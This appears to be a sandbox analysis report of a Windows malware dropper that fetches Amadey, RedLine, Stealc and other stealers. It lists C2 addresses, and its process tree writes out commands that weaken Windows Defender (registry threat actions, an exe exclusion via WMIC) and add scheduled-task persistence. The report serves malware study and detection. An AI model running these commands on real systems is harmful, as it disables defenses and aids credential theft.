Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02-09-2024 06:03

General

  • Target

    f73d07ce044d52f167da9248c3fa0e9ef6fdf52fb5661662a98abc459499f4e2.exe

  • Size

    1.8MB

  • MD5

    587bd21303231871ddde8fac4643cca2

  • SHA1

    efa98a6cc40561f056aeb9104e5770f1aad80158

  • SHA256

    f73d07ce044d52f167da9248c3fa0e9ef6fdf52fb5661662a98abc459499f4e2

  • SHA512

    5b56240241b77f6503186f3d1af5df36be91f3511b6a128fbeaa93f587957eba50b965b4309302ee01f0584d3d2cf0ea2989f45e58051408628e73ad01011644

  • SSDEEP

    49152:1PJTYQFOC6oz2TOlLOG2FN1X5Jj5Jwmk9:1PdXmOVyX5x5JwJ9

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

amadey

Version

4.41

Botnet

1176f2

C2

http://185.215.113.19

Attributes
  • install_dir

    417fd29867

  • install_file

    ednfoki.exe

  • strings_key

    183201dc3defc4394182b4bff63c4065

  • url_paths

    /CoreOPT/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 5 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 31 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3364
      • C:\Users\Admin\AppData\Local\Temp\f73d07ce044d52f167da9248c3fa0e9ef6fdf52fb5661662a98abc459499f4e2.exe
        "C:\Users\Admin\AppData\Local\Temp\f73d07ce044d52f167da9248c3fa0e9ef6fdf52fb5661662a98abc459499f4e2.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4440
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:6140
          • C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3312
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
                PID:4452
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5264
            • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
              "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:396
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2508
                • C:\Users\Admin\AppData\Roaming\5uSJx7oatn.exe
                  "C:\Users\Admin\AppData\Roaming\5uSJx7oatn.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6028
                • C:\Users\Admin\AppData\Roaming\aBatBM3BZ0.exe
                  "C:\Users\Admin\AppData\Roaming\aBatBM3BZ0.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4724
            • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3796
              • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                5⤵
                • Executes dropped EXE
                PID:4792
            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:5284
            • C:\Users\Admin\AppData\Local\Temp\1000129001\Set-up.exe
              "C:\Users\Admin\AppData\Local\Temp\1000129001\Set-up.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:1220
              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:5364
            • C:\Users\Admin\AppData\Local\Temp\1000191001\1.exe
              "C:\Users\Admin\AppData\Local\Temp\1000191001\1.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:2160
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                5⤵
                • Executes dropped EXE
                PID:4736
            • C:\Users\Admin\AppData\Local\Temp\1000228001\GetSys.exe
              "C:\Users\Admin\AppData\Local\Temp\1000228001\GetSys.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:4084
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1976
            • C:\Users\Admin\1000238002\Amadeus.exe
              "C:\Users\Admin\1000238002\Amadeus.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1236
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                5⤵
                  PID:6096
              • C:\Users\Admin\AppData\Local\Temp\1000241001\build.exe
                "C:\Users\Admin\AppData\Local\Temp\1000241001\build.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:580
              • C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe
                "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:4968
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  5⤵
                    PID:5612
                    • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:4212
                      • C:\Users\Admin\AppData\Local\Temp\7zSA5D0.tmp\Install.exe
                        .\Install.exe
                        7⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:5264
                        • C:\Users\Admin\AppData\Local\Temp\7zSA8BE.tmp\Install.exe
                          .\Install.exe /XkVdidolEPC "385107" /S
                          8⤵
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Enumerates system info in registry
                          PID:3172
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:4336
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                              10⤵
                              • Indirect Command Execution
                              • System Location Discovery: System Language Discovery
                              PID:3148
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                11⤵
                                  PID:4960
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    12⤵
                                      PID:5012
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                  10⤵
                                  • Indirect Command Execution
                                  • System Location Discovery: System Language Discovery
                                  PID:5560
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    11⤵
                                      PID:2328
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                        12⤵
                                          PID:3940
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                      10⤵
                                      • Indirect Command Execution
                                      PID:3156
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        11⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4852
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          12⤵
                                            PID:2536
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                        10⤵
                                        • Indirect Command Execution
                                        PID:2756
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          11⤵
                                            PID:4936
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              12⤵
                                                PID:4368
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                            10⤵
                                            • Indirect Command Execution
                                            PID:5792
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              11⤵
                                                PID:1580
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                  12⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5388
                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                    13⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:768
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                            9⤵
                                            • Indirect Command Execution
                                            • System Location Discovery: System Language Discovery
                                            PID:4900
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              10⤵
                                                PID:3060
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                  11⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3740
                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                    12⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3776
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TN "bAURefglkfXMIGMYVR" /SC once /ST 06:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSA8BE.tmp\Install.exe\" e1 /RSdidBqW 385107 /S" /V1 /F
                                              9⤵
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:5396
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1096
                                              9⤵
                                              • Program crash
                                              PID:5316
                                      • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:976
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 508
                                          7⤵
                                          • Program crash
                                          PID:1180
                                      • C:\Users\Admin\AppData\Local\Temp\1000279001\ovrflw.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000279001\ovrflw.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3800
                                        • C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
                                          "C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3960
                                      • C:\Users\Admin\AppData\Local\Temp\1000280001\wrsoc.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000280001\wrsoc.exe"
                                        6⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5416
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                                      5⤵
                                        PID:4956
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                                          6⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4936
                                • C:\Users\Admin\AppData\Local\Temp\1000280001\wrsoc.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000280001\wrsoc.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Accesses Microsoft Outlook profiles
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • outlook_office_path
                                  • outlook_win_path
                                  PID:1492
                              • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                1⤵
                                • Executes dropped EXE
                                PID:1912
                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2800
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 976 -ip 976
                                1⤵
                                  PID:4848
                                • C:\Users\Admin\AppData\Local\Temp\7zSA8BE.tmp\Install.exe
                                  C:\Users\Admin\AppData\Local\Temp\7zSA8BE.tmp\Install.exe e1 /RSdidBqW 385107 /S
                                  1⤵
                                  • Executes dropped EXE
                                  • Drops desktop.ini file(s)
                                  • Drops file in System32 directory
                                  • System Location Discovery: System Language Discovery
                                  • Modifies data under HKEY_USERS
                                  PID:3876
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    2⤵
                                      PID:6072
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                        3⤵
                                        • Indirect Command Execution
                                        PID:2512
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                          4⤵
                                            PID:796
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                              5⤵
                                                PID:3088
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                            3⤵
                                            • Indirect Command Execution
                                            • System Location Discovery: System Language Discovery
                                            PID:1700
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                              4⤵
                                                PID:2584
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2672
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                              3⤵
                                              • Indirect Command Execution
                                              • System Location Discovery: System Language Discovery
                                              PID:5728
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                4⤵
                                                  PID:1540
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:236
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                3⤵
                                                • Indirect Command Execution
                                                PID:2300
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3444
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                    5⤵
                                                      PID:3312
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                  3⤵
                                                  • Indirect Command Execution
                                                  PID:936
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                    4⤵
                                                      PID:5580
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                        5⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Drops file in System32 directory
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4584
                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                          6⤵
                                                            PID:5752
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
